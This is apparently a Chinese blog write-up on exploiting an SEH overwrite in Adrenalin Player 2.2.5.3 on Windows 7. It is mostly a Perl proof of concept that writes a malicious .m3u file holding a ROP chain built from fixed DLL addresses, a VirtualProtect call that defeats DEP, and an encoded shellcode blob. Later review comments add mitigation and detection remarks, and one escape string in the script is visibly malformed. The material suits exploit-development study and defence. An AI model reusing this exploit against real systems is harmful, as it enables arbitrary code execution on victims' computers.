• VirtualProtect 3方法 -seh ret-ASLR-dep-Adrenalin Player 2.2.5.3


    环境  :  WIN7    

    寻找 无ASLR+DEP 的DLL 去溢出

    用 !pvefindaddr rop 慢慢搜；也可以先用 !pvefindaddr noaslr 找出未开启 ASLR 的模块，再针对指定模块搜索

    然后查找合适的东西 EG:  cat rop.txt | grep -I "ADD ESP,4" > 1.txt

    因为是覆盖 SEH handler  所以 覆盖的 ROP小配件不是连续的,首先要先跳到 我们的字符串去

    反复测试时要注意：软件是不是一启动就卡住了，

    这通常是因为它自动打开了上一次测试生成的文件，此时得到的测试结果是不可信的

    动态寻找 VirtualProtect 函数的地址，利用偏移去寻找。

    有时候 可以直接 二进制寻找 指令



    堆栈 处于 不能执行状态


    还有一个问题就是

    0012F004   FFFFFFFF  |hProcess = FFFFFFFF
    0012F008   0012F20C  |Address = 0012F20C
    0012F00C   00000300  |Size = 300 (768.)
    0012F010   00000040  |NewProtect = PAGE_EXECUTE_READWRITE
    0012F014   1024BB98  pOldProtect = Adrenali.1024BB98
    我是从 0012F20C 开始设置可执行的，但实际是从 0012F208 开始执行的，却仍然可以执行——VirtualProtect 以页为单位改变保护属性，这两个地址位于同一页内。

    0012F208    45              inc ebp
    0012F209    45              inc ebp
    0012F20A    45              inc ebp
    0012F20B    45              inc ebp
    0012F20C    45              inc ebp
    0012F20D    45              inc ebp
    0012F20E    45              inc ebp
    0012F20F    45              inc ebp
    0012F210    45              inc ebp



    最后成功POC:

    # PoC file generator for the Adrenalin Player 2.2.5.3 .m3u SEH-overwrite
    # write-up above. The script only builds a byte string and writes it to
    # "1.m3u"; it does not launch or touch the player itself.
    #
    # Every pack('V', 0x10......) value below is an absolute address inside
    # AdrenalinX.dll. The write-up says that module is loaded without ASLR,
    # and the fixed base is what makes hard-coded addresses usable at all;
    # the vendor-side mitigation is therefore relinking that DLL with
    # /DYNAMICBASE and /SAFESEH. DEP is assumed enabled (the stack is
    # non-executable per the notes above), which is why the chain ends in a
    # VirtualProtect call. From a detection standpoint the observable is the
    # VirtualProtect call shown in the debugger log above: a stack address
    # (0012F20C) being changed to PAGE_EXECUTE_READWRITE.
    #
    # Style notes for the script itself: there is no `use strict; use
    # warnings;`, the output handle `$FILE` is an undeclared package global,
    # and `open` is the two-argument form (see the note at the open() call).
    my $file = "1.m3u";#perl    # output path, relative to the working directory
    my $junk1="A"x24; #2176;    # leading padding; 2176 is the total target length used further down
    
    #esp start
    # NOTE(review): the string is all printable alphanumerics; what it decodes
    # to / does is not shown anywhere on this page.
    my $shellcode = "TYIIIIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJIylaxrJTJP8Wn0h3SK98QpOe84rqdLQDLLKXtNmSNYdUckkoGdDFKKSsVoKvSp2RsaxcEPsU5Qbsd03N21tLKPZ4pNkqKflLKQKDLLKEKLKuKLKQKtXlKJKlmwMbJ5ZTxeNrUGuJ5KO1GZXJ550LKw57LlKPLWuQhUShMLKPYGPWskmvSKOQWlKttOKDCkEJ9dOoNVf4zzdBT7xKqKzc7gsJpqV8kJQukQDddglaezDLKSia4S3IMcVLKwLQkLKQIELESKmS3dloKlUqONKqGQqWMqzVjP8eNrUI9WC9KPSphpdQq6PWS586CpPpaBNnkKtRsPPpP2syo1GKL0SKORw";
    
    #######################################################################
    # Gadget addresses; each trailing comment is the author's own disassembly
    # note for that address, reproduced as given.
    my $justParam = pack('V',0x10129df6);            # PUSH ESP # POP ESI # RETN 0x10
    $justParam = $justParam.pack('V',0x10135eaf);    # RETN
    $justParam = $justParam."x"x16;                #top ret 0x10 (filler consumed by the RETN 0x10 above)
    $justParam = $justParam.pack('V',0x10013C35); #ADD ESP,20  RETN [Module : AdrenalinX.dll]  **
    
    $justParam = $justParam."vvvv";
    $justParam = $justParam."1111";
    $justParam = $justParam."2222";
    $justParam = $justParam."3333";
    $justParam = $justParam."4444";
    $justParam = $justParam.pack('V',0x1024bb98);#writeable  (matches pOldProtect = Adrenali.1024BB98 in the log above)
    $justParam = $justParam."xxxx"x2;
    
    #kernel32 address
    # The offsets here (0xFFFFF074 etc.) are tied to the exact OS build the
    # author used; the notes above say WIN7. They are not valid elsewhere.
    my $findkernel32 = pack('V',0x1003de9f);     # PUSH ESI # POP EAX # MOV EAX,ESI # POP EDI # RETN
    $findkernel32 =$findkernel32.'x'x4;
    $findkernel32 =$findkernel32.pack('V',0x1005de8e);   #  XCHG EAX,EBP # RETN
    $findkernel32 =$findkernel32.pack('V',0x1012014d);   #  XOR  EAX,EAX # RETN
    $findkernel32 =$findkernel32.pack('V',0x101201d6);   #  POP EAX # RETN
    $findkernel32 =$findkernel32.pack('V',0xFFFFF074);   # OFFSET F8C  0-f8c 
    $findkernel32 =$findkernel32.pack('V',0x101111e2);   # NEG EAX # RETN
    $findkernel32 =$findkernel32.pack('V',0x1013a5e4);   # ADD EAX,EBP # RETN
    $findkernel32 =$findkernel32.pack('V',0x1010010f);   # POP ECX # RETN
    $findkernel32 =$findkernel32.pack('V',0xFFFFFFFF);
    $findkernel32 =$findkernel32.pack('V',0x1012dd87);   # MOV EAX,DWORD PTR DS:[EAX] # ADD EAX,ECX # RETN
    $findkernel32 =$findkernel32.pack('V',0x1012014b);   # INC EAX # RETN
    # virtualProtect Address
    my $findVirtualProtect =pack('V',0x1002660b);   # XCHG EAX,ECX # MOV EDX,5E5F0002 # POP EBP # POP EBX # RETN 0x0C
    $findVirtualProtect = $findVirtualProtect."x"x8;
    $findVirtualProtect = $findVirtualProtect.pack('V',0x1012014d);# XOR EAX,EAX # RETN
    $findVirtualProtect = $findVirtualProtect."x"x12;#top ret 0xc
    $findVirtualProtect = $findVirtualProtect.pack('V',0x101201d6);# POP EAX # RETN
    $findVirtualProtect = $findVirtualProtect.pack('V',0xFFFB337C);# OFSET 4CC84  1 subtract 2  (author's note: offset, build-specific)
    #758FED5C    50                 push eax
    #758FED5D    FF15 0C178B75      call dword ptr ds:[<&ntdll.RtlExitUserThread>]           ; ntdll.RtlExitUserThread
    
    #758B20D8    jmp dword ptr ds:[<&API-MS-Win-Core-Memory-L1-1-0.Virtua>; KERNELBA.VirtualProtect  
    $findVirtualProtect = $findVirtualProtect.pack('V',0x101111e2);# NEG EAX # RETN
    $findVirtualProtect = $findVirtualProtect.pack('V',0x1002660b);# XCHG EAX,ECX # MOV EDX,5E5F0002 # POP EBP # POP EBX # RETN 0x0C
    $findVirtualProtect = $findVirtualProtect."x"x8;
    $findVirtualProtect = $findVirtualProtect.pack('V',0x1013c584);# SUB EAX,ECX # RETN
    $findVirtualProtect = $findVirtualProtect."x"x12;#top ret 0xc
    
    $findVirtualProtect = $findVirtualProtect.pack('V',0x1006798b)x 8;# INC ESI # RETN
    
    $findVirtualProtect = $findVirtualProtect.pack('V',0x1010eac7);# MOV DWORD PTR DS:[ESI+10],EAX # MOV EAX,ESI # POP ESI # RETN
    $findVirtualProtect = $findVirtualProtect."x"x4;
    
    ########################11111111111111111111###############################################
    # $param1..$param4 are four near-identical sections; the author's own
    # gadget comments are kept verbatim on each line.
    my $param1 = pack('V',0x10117105); #0x10117105 : # PUSH EAX # POP ESI # POP EBX # RETN 	[Module : AdrenalinX.dll]  **
    $param1 = $param1."x"x4;
    
    $param1 = $param1.pack('V',0x1006798B)x4;  # INC ESI # RETN 	[Module : AdrenalinX.dll]  ** 
    
    $param1 = $param1.pack('V',0x1014B57F);  # ADD EAX,100 # POP EBP # RETN 	[Module : AdrenalinX.dll]  ** 
    $param1 = $param1."x"x4;
    $param1 = $param1.pack('V',0x1014B57F);  # ADD EAX,100 # POP EBP # RETN 	[Module : AdrenalinX.dll]  ** 
    $param1 = $param1."x"x4;
    
    $param1 = $param1.pack('V',0x1010EAC7); #MOV DWORD PTR DS:[ESI+10],EAX  MOV EAX,ESI  POP ESI  RETN [Module : AdrenalinX.dll]  ** 
    $param1 = $param1."x"x4;
    
    ########################22222222222222222222###############################################
    my $param2 = pack('V',0x10117105); #0x10117105 : # PUSH EAX # POP ESI # POP EBX # RETN 	[Module : AdrenalinX.dll]  **
    $param2 = $param2."x"x4;
    
    $param2 = $param2.pack('V',0x1006798B)x4;  # INC ESI # RETN 	[Module : AdrenalinX.dll]  ** 
    
    
    $param2 = $param2.pack('V',0x1014B57F);  # ADD EAX,100 # POP EBP # RETN 	[Module : AdrenalinX.dll]  ** 
    $param2 = $param2."x"x4;
    $param2 = $param2.pack('V',0x1014B57F);  # ADD EAX,100 # POP EBP # RETN 	[Module : AdrenalinX.dll]  ** 
    $param2 = $param2."x"x4;
    
    $param2 = $param2.pack('V',0x1010EAC7); #MOV DWORD PTR DS:[ESI+10],EAX  MOV EAX,ESI  POP ESI  RETN [Module : AdrenalinX.dll]  ** 
    $param2 = $param2."x"x4;
    
    ########################33333333333333333333###############################################
    my $param3 = pack('V',0x10117105); #0x10117105 : # PUSH EAX # POP ESI # POP EBX # RETN 	[Module : AdrenalinX.dll]  **
    $param3 = $param3."x"x4;
    
    $param3 = $param3.pack('V',0x1006798B)x4;  # INC ESI # RETN 	[Module : AdrenalinX.dll]  ** 
    
    $param3 = $param3.pack('V',0x1001CD6C);  # XOR EAX,EAX # RETN 	[Module : AdrenalinX.dll]  ** 
    
    $param3 = $param3.pack('V',0x1014B57F);  # ADD EAX,100 # POP EBP # RETN 	[Module : AdrenalinX.dll]  ** 
    $param3 = $param3."x"x4;
    $param3 = $param3.pack('V',0x1014B57F);  # ADD EAX,100 # POP EBP # RETN 	[Module : AdrenalinX.dll]  ** 
    $param3 = $param3."x"x4;
    $param3 = $param3.pack('V',0x1014B57F);  # ADD EAX,100 # POP EBP # RETN 	[Module : AdrenalinX.dll]  ** 
    $param3 = $param3."x"x4;
    
    $param3 = $param3.pack('V',0x1010EAC7); #MOV DWORD PTR DS:[ESI+10],EAX  MOV EAX,ESI  POP ESI  RETN [Module : AdrenalinX.dll]  ** 
    $param3 = $param3."x"x4;
    
    ########################44444444444444444444###############################################
    my $param4 = pack('V',0x10117105); #0x10117105 : # PUSH EAX # POP ESI # POP EBX # RETN 	[Module : AdrenalinX.dll]  **
    $param4 = $param4."x"x4;
    
    $param4 = $param4.pack('V',0x1006798B);  # INC ESI # RETN 	[Module : AdrenalinX.dll]  ** 
    $param4 = $param4.pack('V',0x1006798B);  # INC ESI # RETN 	[Module : AdrenalinX.dll]  ** 
    $param4 = $param4.pack('V',0x1006798B);  # INC ESI # RETN 	[Module : AdrenalinX.dll]  ** 
    $param4 = $param4.pack('V',0x1006798B);  # INC ESI # RETN 	[Module : AdrenalinX.dll]  ** 
    
    $param4 = $param4.pack('V',0x1001CD6C);  # XOR EAX,EAX # RETN 	[Module : AdrenalinX.dll]  ** Null byte 
    
    $param4 = $param4.pack('V',0x1014B571);  # ADD EAX,40 # POP EBP # RETN 	[Module : AdrenalinX.dll]  ** (0x40 = PAGE_EXECUTE_READWRITE, cf. NewProtect in the log above)
    $param4 = $param4."x"x4;
    
    $param4 = $param4.pack('V',0x1010EAC7); #MOV DWORD PTR DS:[ESI+10],EAX  MOV EAX,ESI  POP ESI  RETN [Module : AdrenalinX.dll]  ** 
    $param4 = $param4."x"x4;
    ########################xxxxxxxxxxxxxxxxxxxx###############################################
    my $justret = pack('V',0x101263a0)."x"x4;  # XCHG EAX,ESP # RETN
    
    # Debug print of the chain length so far. The string literal spans two
    # source lines, i.e. it contains a literal newline rather than "\n";
    # the output is the same.
    print length($junk1.$justParam.$findkernel32.$findVirtualProtect.$param1.$param2.$param3.$param4.$justret)."
    ";
    my $junk2 = "x"x100;
    
    # NOTE(review): as written this is a plain ASCII literal (no backslash
    # escapes are present in the page text), so it contributes the text
    # "x81xECx22xfexffxff" verbatim.
    $junk2 = $junk2."x81xECx22xfexffxff";
    $junk2 = $junk2.$shellcode;
    
    # Pad with "E" so that the total length before the handler equals 2176
    # (the number noted next to $junk1 above); the SEH handler pointer is
    # expected to land at that offset in the file.
    $junk2 = $junk2.("E"x(2176-length($junk1.$justParam.$findkernel32.$findVirtualProtect.$param1.$param2.$param3.$param4.$justret. $junk2)));
    
    my $JustHandlerToStack = pack('V',0x100D7AEC);  # ADD ESP,418 # RETN 	[Module : AdrenalinX.dll]  ** (overwritten SEH handler value)
    
    my $payload= $junk1.$justParam.$findkernel32.$findVirtualProtect.$param1.$param2.$param3.$param4.$justret.$junk2.$JustHandlerToStack;
    
    print length($payload);  
    # NOTE(review): two-argument open on an undeclared package global with no
    # error check; under `use strict` this would not compile. Preferred form:
    #   open my $fh, '>', $file or die "open $file: $!";
    open($FILE,">$file");      
    binmode($FILE);            # raw bytes; no newline translation on Windows
    print $FILE $payload;      
    close($FILE);              # unchecked; write errors would go unnoticed



















  • 原文地址:https://www.cnblogs.com/zcc1414/p/3982342.html